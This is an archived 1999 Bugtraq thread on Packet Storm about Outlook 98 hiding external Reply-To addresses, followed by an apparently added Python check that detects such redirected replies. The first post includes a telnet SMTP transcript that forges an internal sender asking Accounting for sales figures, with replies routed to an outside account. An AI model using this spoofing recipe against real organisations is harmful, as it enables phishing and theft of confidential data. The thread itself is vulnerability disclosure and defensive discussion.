ms.outlook.spoof.txt

17 Aug 1999 | Reported by Packet Storm | Type: packetstorm | Source: packetstormsecurity.com

Outlook 98 allows spoofing of internal users through misleading Reply-To address method.

Code
`Date: Tue, 20 Apr 1999 15:10:05 -0700  
From: Nate Lawson <[email protected]>  
To: [email protected]  
Subject: Outlook 98 allows spoofing internal users  
  
Problem: Outlook uses a sender's Reply-To address silently, allowing  
a user to inadvertently send data to an Internet mail account  
when intending to reply to an internal, trusted user.  
  
Impact: Anyone on the Internet can spoof a trusted internal Exchange user  
and get replies sent back to themself without the user knowing they  
weren't responding to another internal user.  
  
How to reproduce:  
  
1. Spoof mail as an internal user with a Reply-To address claiming to be  
an internal user, but an address of an Internet account, say hotmail.  
2. Go into Outlook and read the mail. The mail looks like it was internally  
generated but viewing the full Internet headers under View->Options  
shows the bogus Reply-To header.  
3. Hit Reply in Outlook. The To: field looks like it's going to a valid  
internal user, but right clicking on it and choosing Properties shows  
that the internal user it is sending the reply to is actually an Internet  
address.  
4. Enter some text and hit Send. Observe that the mail went to the attacker's  
account, not the internal one.  
  
A quick script:  
  
{root 5:00pm} ~> telnet mail.example.com 25  
Trying 10.20.2.5...  
Connected to mail.example.com.  
Escape character is '^]'.  
220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready  
helo losebag  
250 OK  
mail from:<>  
250 OK - mail from <>  
rcpt to:<[email protected]>  
250 OK - Recipient <[email protected]>  
data  
354 Send data. End with CRLF.CRLF  
>From: Nate Lawson  
To: Accounting  
Reply To: Nate Lawson<[email protected]>  
Subject: important!  
  
Please reply with the latest copy of our sales figures!  
  
Thanks,  
Nate  
.  
250 OK  
quit  
221 closing connection  
Connection closed by foreign host.  
  
Now, a reply to the email will go not to the trusted internal user Nate  
Lawson <[email protected]> but to the attacker, <[email protected]>.  
Worse, the user sees no indication that the mail is outward-bound! The  
To: field on the reply simply shows "Nate Lawson", a valid internal user.  
  
Affected programs: Only tested on Outlook 98  
  
Known use of this bug to get confidential information: none yet  
  
Suggested Fix: always show the full email address of any recipient that is  
not local (i.e. [email protected] would be hidden but any instance of  
[email protected] would be shown)  
  
Microsoft has been notified, but claimed this was a weakness in SMTP and  
would not be fixed until a secure successor to SMTP is implemented. They  
obviously missed the point -- the error is not in that mail can be forged,  
but that Outlook allows a user to respond to a message that looks local  
and legitimate, but is actually destined for an outside address.  
  
-Nate  
  
-----------------------------------------------------------------------  
  
Date: Sun, 25 Apr 1999 18:36:11 +0200  
From: Peter van Dijk <[email protected]>  
To: [email protected]  
Subject: Re: Outlook 98 allows spoofing internal users  
  
On Tue, Apr 20, 1999 at 03:10:05PM -0700, Nate Lawson wrote:  
>  
> Suggested Fix: always show the full email address of any recipient that is  
> not local (i.e. [email protected] would be hidden but any instance of  
> [email protected] would be shown)  
  
Yeah, like: I am [email protected] and I'd like outlook to hide [email protected].  
  
Outlook should not be hiding anything..  
  
Greetz, Peter  
--  
| 'He broke my heart, | Peter van Dijk |  
I broke his neck' | [email protected] |  
nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |  
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |  
  
-----------------------------------------------------------------------  
  
Date: Sun, 2 May 1999 21:41:39 +0200  
From: Sebastian Schreiber <[email protected]>  
Reply-To: [email protected]  
To: [email protected]  
Subject: Re: Outlook 98 allows spoofing internal users  
  
Hi Nate,  
  
I was not able to reproduce the exploit that you reported to the  
bugtraq mailing list. Outlook98 did exactly what I expected: when I  
open the mail, I see the "From:"-header in the message. When I reply  
to the email, Outlook takes the "Reply-To:"-address of the  
header. Which version of Outlook did you test?  
  
Best Regards, Sebastian  
  
PS: your "quick script" has a little bug: the header entry should be  
"Reply-To:" instead of "Reply To:".  
  
--  
-- What's a letter? Is it like E-mail? ((o)(o))  
|---------------------------------------------------ooOo-( )-oOoo-|  
| Sebastian Schreiber, Burgholzweg 36, 72070 Tübingen ( ) |  
| Germany, Voice: ++49 (0)7071 49570 ( ) |  
| GSM: 0049-173-3502725 (..) |  
|------------------------------------------------------------------|  
Key fingerprint = 3F F5 D5 E0 0A 59 A5 C4 E7 4F 2B EA 7D 83 89 98  
  
-----------------------------------------------------------------------  
  
Date: Wed, 5 May 1999 11:05:03 +1000  
From: Toby Chamberlain <[email protected]>  
To: [email protected]  
Subject: Re: Outlook 98 allows spoofing internal users  
  
Howdy,  
  
I _was_ able to reproduce the exploit to great effect... I created a  
perl script to automate the process, passed it on to the office clown  
and had a great time listening to the varied match-making arrangements  
he set up.  
  
The problem seems to be that Outlook (in the default setup) hides the  
address part of the reply-to header when using it to create the value to  
put in the "To" box of the reply. A reply-to header of "John Smith  
<[email protected]>" shows up as simply "John Smith" in the "To:" box  
when you hit reply... but of course so does "John Smith  
<[email protected]>". The other mail readers I tested it on  
(Hotmail and Netscape Messenger) showed the reply-to header in full.  
  
Cheers  
Toby  
  
  
>Hi Nate,  
>  
>I was not able to reproduce the exploit that you reported to the  
>bugtraq mailing list. Outlook98 did exactly what I expected: when I  
>open the mail, I see the "From:"-header in the message. When I reply  
>to the email, Outlook takes the "Reply-To:"-address of the  
>header. Which version of Outlook did you test?  
>  
>Best Regards, Sebastian  
>  
>PS: your "quick script" has a little bug: the header entry should be  
> "Reply-To:" instead of "Reply To:".  
  
-----------------------------------------------------------------------  
  
Date: Thu, 6 May 1999 11:36:38 -0700  
From: Russ Johnson <[email protected]>  
To: [email protected]  
Subject: Re: Outlook 98 allows spoofing internal users  
  
I'm sending this from an Outlook 98 client.  
  
If you don't have message quoting on, then you are correct. It's tough to determine where a message is going, whether it's  
internal or external.  
  
For instance, when I hit the "Reply to all" button, it includes the following two entries in the To: field:  
  
Toby Chamberlain; [email protected]  
  
(I removed Toby from the TO: field, since he should get this in the list)  
  
No mention of Toby's email address. It could be internal or external. I agree that MS should give some indication in the  
To: field that this isn't an internal address.  
  
Until such time that MS agrees with us, the simple work around is to make sure to use the "Include Original Message"  
option for replies and forwards. (TOOLS>OPTIONS>EMAIL OPTIONS, lower half of dialog.) Then, the original message is  
included, with the header outlined below. As you can see, the external email address is there for all to see. Even when  
you spoof it as outlined previously. Of course, this leaves open the possibility that users won't edit the "quoted" text  
for brevity, and we end up with exponentially growing mail.  
  
It's not the best solution, but MS may choose to not agree with us.  
  
Russ  
  
-----Original Message-----  
From: Toby Chamberlain [mailto:[email protected]]  
Sent: Tuesday, May 04, 1999 6:05 PM  
To: [email protected]  
Subject: Re: Outlook 98 allows spoofing internal users  
  
`
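
The thread's core point is that the reply target comes from Reply-To while the client shows only the display name. The following is an added example, not code from the thread or from any mail client: a mail-filter style check that works out where a reply would go, warns when a message claiming an internal sender redirects replies outside, and renders recipients as the thread's suggested fix proposes. `INTERNAL_DOMAINS`, the function names and the sample messages are assumptions constructed for illustration.

```python
from email import message_from_string
from email.utils import getaddresses

INTERNAL_DOMAINS = {"example.com"}  # assumption: the organisation's own mail domains


def is_internal(addr, internal=INTERNAL_DOMAINS):
    """True when the address's domain is ours or a subdomain of ours."""
    domain = addr.rpartition("@")[2].lower()
    return any(domain == d or domain.endswith("." + d) for d in internal)


def render_recipient(name, addr, internal=INTERNAL_DOMAINS):
    """Show a bare display name only for local recipients (the fix proposed in the thread)."""
    if name and is_internal(addr, internal):
        return name
    return f"{name} <{addr}>" if name else addr


def audit_reply(raw, internal=INTERNAL_DOMAINS):
    """Return (rendered reply recipients, warnings) for one raw RFC 822 message."""
    msg = message_from_string(raw)
    sender = getaddresses(msg.get_all("From", []))
    reply_to = getaddresses(msg.get_all("Reply-To", []))
    targets = reply_to or sender  # a Reply-To header overrides From when replying
    claims_internal = any(is_internal(a, internal) for _, a in sender)
    sender_names = {n.strip().lower() for n, _ in sender if n}
    warnings = []
    for name, addr in targets:
        if not addr or is_internal(addr, internal):
            continue
        # External reply target on a message that presents itself as internal.
        if claims_internal or name.strip().lower() in sender_names:
            warnings.append(f"reply to {name or addr!r} leaves the organisation: {addr}")
    rendered = [render_recipient(n, a, internal) for n, a in targets]
    return rendered, warnings


# Constructed sample messages (not taken from the thread).
SPOOFED = (
    "From: Nate Lawson <nate@example.com>\n"
    "To: Accounting <accounting@example.com>\n"
    "Reply-To: Nate Lawson <nate@webmail.example>\n"
    "Subject: important!\n\n"
    "Please reply with the latest copy of our sales figures!\n"
)
BENIGN = SPOOFED.replace("nate@webmail.example", "nate@example.com")

if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("benign", BENIGN)):
        print(label, audit_reply(raw))
```

The same check can run at the mail gateway to tag or quarantine inbound messages whose From claims an internal domain while Reply-To points elsewhere.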
